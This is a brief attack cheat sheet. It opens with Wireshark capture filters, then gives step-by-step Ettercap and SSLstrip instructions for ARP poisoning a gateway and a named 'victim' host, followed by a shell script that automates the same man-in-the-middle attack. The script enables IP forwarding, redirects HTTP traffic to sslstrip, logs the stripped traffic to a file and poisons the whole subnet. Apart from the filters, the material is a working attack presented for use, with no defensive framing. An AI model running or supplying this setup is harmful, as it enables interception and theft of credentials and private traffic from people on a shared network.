.::[Wireshark]::.
tcp.port ==
ip.addr|dst|src ==
udp[8:3]==81:60:03
eth.addr[0:3]==00:06:5B
udp contains 81:60:03
sip.To contains "a1762"
http.request.uri matches "gl=se$"
______________________
tcp.port == 25 or icmp
ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
tcp.window_size == 0 && tcp.flags.reset != 1
smb || nbns || dcerpc || nbss || dns

.::[Ettercap+SSLstrip]::.
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1997

sslstrip -a -k -f
ettercap -G

- Sniff-> Unified Sniffing-> Network Interface: eth0
- Hosts-> Scan for Hosts
- Hosts-> Hosts List (H)
- Select 192.168.1.1 (gateway)-> Click 'Add to Target 1'
- Select 192.168.1.9 (victim)-> Click 'Add to Target 2'
- MITM-> Arp Poisoning-> Check 'Sniff Remote Connections'-> Ok
- Start-> Start Sniffing
________________
#!/bin/sh

	echo "Enter your network interface"
	read	NETWORKINTERFACE
	echo "$NETWORKINTERFACE"
	#enabling Ip forward
	echo "1" > /proc/sys/net/ipv4/ip_forward
	value=$( cat /proc/sys/net/ipv4/ip_forward )
	#checking if IP Forwarding is enabled
	if [ $value -eq 1 ]
	then
		#configuring IP table
  		iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

		#Opening a New Tab on terminal to run SSLstrip Just click enter when the new tab opens

		WID=$(xprop -root | grep "_NET_ACTIVE_WINDOW(WINDOW)"| awk '{print $5}')
		xdotool windowfocus $WID
		xdotool key ctrl+shift+t
		xdotool type --delay 1 --clearmodifiers "sslstrip -k -f -l 10000 -w sslstrip.txt"


		#Running Ettercap 
		
		ettercap -T -q -M ARP /// /// -i $NETWORKINTERFACE
	else
          		echo "Check if you have ettercap installed"
	fi